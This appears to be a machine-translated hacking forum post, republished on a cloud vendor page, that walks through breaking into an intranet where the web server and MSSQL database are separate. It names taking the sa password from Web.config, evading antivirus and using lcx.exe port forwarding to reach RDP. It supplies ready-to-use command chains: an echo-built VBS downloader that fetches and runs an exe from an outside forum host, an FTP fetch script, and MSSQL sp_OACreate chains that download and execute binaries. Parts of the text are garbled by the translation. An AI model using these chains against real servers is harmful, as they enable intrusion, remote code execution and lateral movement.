Infiltration thinking of the separation of the MSSQL Station library

Source: Internet
Author: User

This article transferred from: http://bbs.blackbap.org/thread-6203-1-2.html

1. Server is intranet environment, station library separation, through Web. config to find the database service library sa account password, successfully added users (192.168.0.206).
2. The Web server (192.168.0.203), the database server (192.168.0.206) are present in Symantec antivirus software and cannot be forwarded lcx.exe tools.
3. Testing other forwarding tools, either Avira, or unusable, using the Reduh tool can only forward the current IP, and the speed is very slow, can't stand 0.0.
4. Using Msfpayload generated EXE file is also Avira, because the server is x64, Msfencode no x64 encoder, so failed to rebound successfully.

Idea 1: Turn off kill soft, download the file by following the commands provided below (not tested)
Idea 2: Use MSF aspx bounce, then forward and cross-route penetration (succeeded)

Normal thinking: If not kill soft, direct lcx.exe to 192.168.0.203, and then use the following command to forward 192.168.0.206:
C:\lcx.exe-slave your extranet IP 51 192.168.0.206 3389//After seeing this, you should all know it 0.0.

DOS command: (one line execution)

    1. echo Set Post = CreateObject ("Msxml2.xmlhttp") >>xxx.vbs
    2. echo Set Shell = CreateObject ("Wscript.Shell") >>xxx.vbs
    3. echo Post.open "GET", "Http://bbs.blackbap.org/payload.exe", 0 >>xxx.vbs
    4. Echo post.send () >>xxx.vbs
    5. echo Set Aget = CreateObject ("ADODB. Stream ") >>xxxc.vbs
    6. echo Aget.mode = 3 >>xxx.vbs
    7. echo Aget.type = 1 >>xxx.vbs
    8. Echo Aget.open () >>xxx.vbs
    9. echo aget.write (post.responsebody) >>xxx.vbs
    10. echo Aget.savetofile "C:\xxxc.exe", 2 >>xxx.vbs
    11. Echo Wscript.Sleep >>xxxc.vbs
    12. Echo Shell.run ("C:\xxx.exe") >>xxx.vbs
Copy Code
    1. Echo Open 127.0.0.1>c:\ftp.dat
    2. Echo Admin>>c:\ftp.dat
    3. Echo Admin>>c:\ftp.dat
    4. Echo Binary>>c:\ftp.dat
    5. Echo Get Lcx.exe>>c:\ftp.dat
    6. Echo Bye>>c:\ftp.dat
    7. Ftp-s:c:\ftp.dat
Copy Code

MSSQL command:

    1. DECLARE @js int
    2. EXEC sp_OACreate ' ScriptControl ', @js out
    3. EXEC sp_OASetProperty @js, ' Language ', ' JavaScript1.1 '
    4. EXEC sp_OAMethod @js, ' Eval ', NULL, ' var x = new ActiveXObject ("Microsoft.XMLHTTP"); X.open ("GET", "Url", 0); X.send (); var s = new ActiveXObject ("ADODB. Stream "); S.mode = 3;s.type = 1;s.open (); S.write (x.responsebody); S.savetofile (" c:\\windows\\ set the saved EXE file name to EXE ", 2); var r = new ActiveXObject ("Wscript.Shell"); R.run ("c:\\windows\\ set the saved EXE file name. exe"); '
Copy Code
    1. declare @o int, @f int, @t int, @ret int
    2. exec sp_oacreate ' Scripting.FileSystemObject ', @o out
    3. exec sp_OAMethod @o, ' CreateTextFile ', @f out, ' C:\1.bat ', 1
    4. exec @ret = sp_OAMethod @f, ' WriteLine ', NULL, ' open IP '
    5. exec @ret = sp_OAMethod @f, ' WriteLine ', NULL, ' FTP account '
    6. exec @ret = sp_OAMethod @f, ' WriteLine ', NULL, ' ftp password '
    7. exec @ret = sp_OAMethod @f, ' WriteLine ', NULL, ' Get Lcx.exe '
    8. exec @ret = sp_OAMethod @f, ' WriteLine ', NULL, ' Bye '

Infiltration thinking of the separation of the MSSQL Station library

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.